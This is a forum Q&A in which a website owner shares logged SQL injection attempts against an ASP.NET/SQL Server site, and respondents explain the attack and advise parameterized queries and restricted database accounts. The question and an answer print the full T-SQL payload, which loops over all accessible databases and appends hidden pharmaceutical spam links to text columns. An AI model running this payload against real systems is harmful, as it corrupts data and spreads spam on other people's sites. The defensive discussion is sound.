# Someone is trying to hack my website

Tags: c#, asp.net, sql-server

I am catching the following exception in my logs:

```
mt: 15867';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in 
('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case 
ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style=&quot;display:none&quot;''+char(62)+''inderal 10mg ''+char(60)+''a href=&quot;http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill&quot;''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else 
''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in 
(2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--&lt;br/&gt;    sess: 2&lt
```

The hacking begins at the moment of ;declare and finishes at the --.  All of my Sql Queries should be paramaterized but if not, I need to eliminate this threat.

What are my best options here?  I have a specific "web" login account for the database.  What is best practice for minimizing this web login account credentials or denying specific sql objects?

What is this person trying to do?  Here's another hack attempt:

```
;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into 
@w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style=&quot;display:none&quot;''+char(62)+''tadalafil 40mg ''+char(60)+''a 
href=&quot;http:''+char(47)+char(47)+''www.guitar-frets.com''+char(47)+''blog''+char(47)+''page''+char(47)+''synthroid-200mcg.aspx&quot;''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''levofloxacin 750mg'''' when 1 then ''''guitar-frets.com'''' else ''''guitar-frets.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' valacyclovir 
pill''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin 
exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--&lt;br
```

And here's a snapshot of my log.  If you look from bottom to top you can see that this hacker is trying each parameter to inject his code.

[image]

Comment: Quite simple really: ensure you parameterize your SQL queries for this exact reason. Create a user account that only has access to certain databases (or database rather) for this particular website. Have the server that has SQL Server installed deny any connections only from specified IP addresses.

Comment: fetch process. are you on vpn, sometimes when crawling for backup by servers

Comment: The OWASP Foundation has all you need to know: https://www.owasp.org/index.php/Category:OWASP_Guide_Project

Answer (score 4):

As other said, use parameterized SQL queries.

Here is the SQL formatted:

```
DECLARE @b CURSOR; 
DECLARE @s VARCHAR(8000); 
DECLARE @w VARCHAR(99); 

SET @b=CURSOR 
FOR SELECT Db_name() 
    UNION 
    SELECT NAME 
    FROM   sys.databases 
    WHERE  ( Has_dbaccess(NAME) != 0 ) 
           AND NAME NOT IN ( 'master', 'tempdb', 'model', 'msdb', Db_name() ); 

OPEN @b; 

FETCH next FROM @b INTO @w; 

WHILE @@FETCH_STATUS = 0 
  BEGIN 
      SET @s='begin try use ' + @w 
             + 
';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case  ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style=&quot;display:none&quot;''+char(62)+''inderal 10mg ''+char(60)+''a href=&quot;http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill&quot;''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else  ''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in  (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch'
    ; 

    EXEC (@s); 

    FETCH next FROM @b INTO @w; 
END; 

CLOSE @b--<br/>    sess: 2<
```

And the inner query:

```
; 
DECLARE @c 
CURSOR;DECLARE @d VARCHAR(4000);SET @c= 
  CURSOR FOR 
    SELECT ''UPDATE [''+TABLE_NAME+''] 
    SET    [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+ 
           CASE Abs(Checksum(Newid()))%10 
                  WHEN 0 THEN ''''''+Char(60)+''div style=&quot;DISPLAY:none&quot;''     +char(62)+''inderal 10mg ''+char(60)+''a href=&quot;HTTP:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''keflex-pill&quot;''     +char(62)+''''''+ 
           CASE abs(checksum(newid()))%3 
           WHEN 0 THEN 
             ''''blog.coepd.com'''' 
           WHEN 1 THEN 
             ''''blog.coepd.com'''' 
             ELSE ''''blog.coepd.com'''' 
           END 
           +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+''''''
           ELSE '''''''' 
         END 
         '' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN information_schema.columns ON o.NAME=table_name WHERE(
           indid IN (0, 
                     1) 
         ) 
         AND 
         data_type LIKE ''%varchar'' 
         AND 
         ( 
           character_maximum_length IN (2147483647, 
                                        -1) 
         );OPEN @c;FETCH next 
         FROM  @c 
         INTO  @d;WHILE @@FETCH_STATUS=0 
         BEGIN 
           EXEC (@d); 
           FETCH next 
           FROM  @c 
           INTO  @d; 

         END;CLOSE @c 
       end tryBEGIN catch 
       END catch
```

They are basically trying to update all text columns in all of your databases and tables.

So it's just a spam script trying to advertise some magic pills.

Answer (score 1):

Start blocking IP's would be a place to start and make sure that all your input is escaped etc. If everything is escaped properly and I mean using whatever the database recommends, not a regex you found on stackoverflow :) there's little chance of SQL injection.

Make sure that what they are doing is not attacking a third party library ie it might not be your code they're attacking it could be a know vulnerability against a common library you are using.

If SQL injection is not going to happen they may try to DOS/DDOS or something else next to disrupt your site. There's little most sites can do to mitigate a serious DDOS attempt but if you start blocking IP's the hacker might be quick to realize that there's no fruit where she's looking and move on.

I'm assuming that access to backend systems is secure ie in a VPN with decent password policies etc.